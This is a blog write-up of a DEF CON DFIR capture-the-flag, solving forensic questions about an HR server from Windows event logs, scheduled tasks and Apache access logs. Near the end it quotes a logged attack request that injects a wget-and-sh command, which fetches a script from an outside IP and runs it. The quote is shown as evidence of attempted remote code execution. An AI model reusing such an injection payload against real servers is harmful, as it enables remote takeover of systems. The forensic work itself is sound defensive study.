DEF CON DFIR CTF 2018 Write-up Part 2 - HR Server Advanced and Expert Challenges

4 minute read Published:

A writeup for the 2018 DEF CON DFIR CTF - Part 2
Table of Contents

Introduction

Following on from my last blog, I turned to the Advanced and Expert level challenges to try and uncover undoubtedly nefarious deeds. Let’s go!

HR Server - Advanced Challenges

Logon Event

The first question asks you to name the user that logged on at a specific time (given in UTC), as well as the logon type, logon process and IP address. With all our data ingested and ready for searching in Kibana, this was reasonably straightforward. I narrowed the time range down to a couple of seconds around the required timestamp and discovered the following logon event (4624):

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}"/>
    <EventID>4624</EventID>
    <Version>2</Version>
    ...
    <TimeCreated SystemTime="2018-07-30T22:31:33.868384100Z"/>
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">WIN-29U41M70JCO$</Data>
    <Data Name="SubjectDomainName">WORKGROUP</Data>
    <Data Name="SubjectLogonId">0x00000000000003e7</Data>
    <Data Name="TargetUserSid">S-1-5-21-2967420476-1305424719-3994513216-1000</Data>
    <Data Name="TargetUserName">mpowers</Data>
    <Data Name="TargetDomainName">WIN-29U41M70JCO</Data>
    <Data Name="TargetLogonId">0x0000000024ba28b7</Data>
    <Data Name="LogonType">10</Data>
    <Data Name="LogonProcessName">User32 </Data>
    ...
    <Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
    <Data Name="IpAddress">74.118.138.195</Data>
    ...
  </EventData>
</Event>

All the data we need for the answer is here: mpowers - 10 - User32 - 74.118.138.195. LogonType 10 indicates a remote interactive logon… it’s probably fine?

Incidentally, this information came from a shadow copy of the security event log. As pointed out in InfoSecurityGeek’s walkthrough, the security event log was wiped several days later (event ID 1102). Nefarious deeds indeed.

Task Started

Next up: what is the name of the task that was started at blah blah particular UTC timestamp? It’s a great question really, and I have no idea. That is, I had no idea until I looked it up in Kibana:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-TaskScheduler" Guid="{DE7B24EA-73C8-4A09-985D-5BDADCFA9017}"/>
    <EventID>100</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>100</Task>
    <Opcode>1</Opcode>
    <Keywords>0x8000000000000001</Keywords>
    <TimeCreated SystemTime="2018-07-27T02:42:43.948604500Z"/>
    <EventRecordID>2383</EventRecordID>
    <Correlation ActivityID="{937BB509-B699-4441-B2FE-BB167784D470}"/>
    <Execution ProcessID="828" ThreadID="7568"/>
    <Channel>Microsoft-Windows-TaskScheduler/Operational</Channel>
    <Computer>WIN-29U41M70JCO</Computer>
    <Security UserID="S-1-5-18"/>
  </System>
  <EventData Name="TaskStartEvent">
    <Data Name="TaskName">\Throw Taco</Data>
    <Data Name="UserContext">WIN-29U41M70JCO\mpowers</Data>
    <Data Name="InstanceId">{937BB509-B699-4441-B2FE-BB167784D470}</Data>
  </EventData>
</Event>

As much as I love good tacos, \Throw Taco doesn’t sound like a very legit task IMO. We’d better keep investigating.

Web App

A couple more questions are up next re. the OrangeHRM portal. First one asks which IP address was accessing the web portal with the user agent “Chrome 68.0.3440.84”? Some grepping of the access logs will suffice here:

# grep -a 68.0.3440 /mnt/windows_mount/Program\ Files/OrangeHRM/4.1/apache/logs/access.log | cut -d ' ' -f1 | uniq
74.118.139.108

Next, we need to know which version of Apache was being used, which you can find in the changelog (C:\Program Files\OrangeHRM\4.1\apache\CHANGES.txt) - the answer is 2.4.26 (the CTF just requires the answer 2.4).

USN Flags

To round out the Advanced challenges, we need to give the integer representation for a reason code consisting of three particular flags ORed together. I solved this by just searching my dataset for records that contained the relevant flags (having been parsed out of the USN Journal) and then just read off the value:

Alternatively, you could look up the flag values and calculate the answer that way: 0x80000000 | 0x2 | 0x100 = 0x80000102 = 2147483906.

HR Server - Expert Challenges

Web Traffic

There’s only two questions in the expert category, and to be honest they’re a bit of a doddle. The first question asks you for the top communicating IP address with the web server:

# cut -d ' ' -f1 /mnt/windows_mount/Program\ Files/OrangeHRM/4.1/apache/logs/access.log | uniq -c | sort -n | tail -n 1
    233 74.118.138.195

Hmmm… it’s the same IP that we saw doing remote logons as the mpowers user.

Finally, we’re asked for the number of requests that were made to the web server that contain a wget command:

# grep -a wget /mnt/windows_mount/Program\ Files/OrangeHRM/4.1/apache/logs/access.log | wc -l
101

Pretty sketchy stuff there - looks like some kind of attempted RCE shenanigans, as per the following sample log that includes an attempt to run wget:

92.3.30.123 - - [23/Jul/2018:12:26:27 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 1053 "-" "Hello, World"

And that’s it… we’re rewarded for finishing all of the HR Server questions with the password to the next image (tacotunities). On top of that, we’re awarded five bonus points. Hurrah! Tune in soon for the next part of the write-up, which will be linked below when it’s ready.

MOAR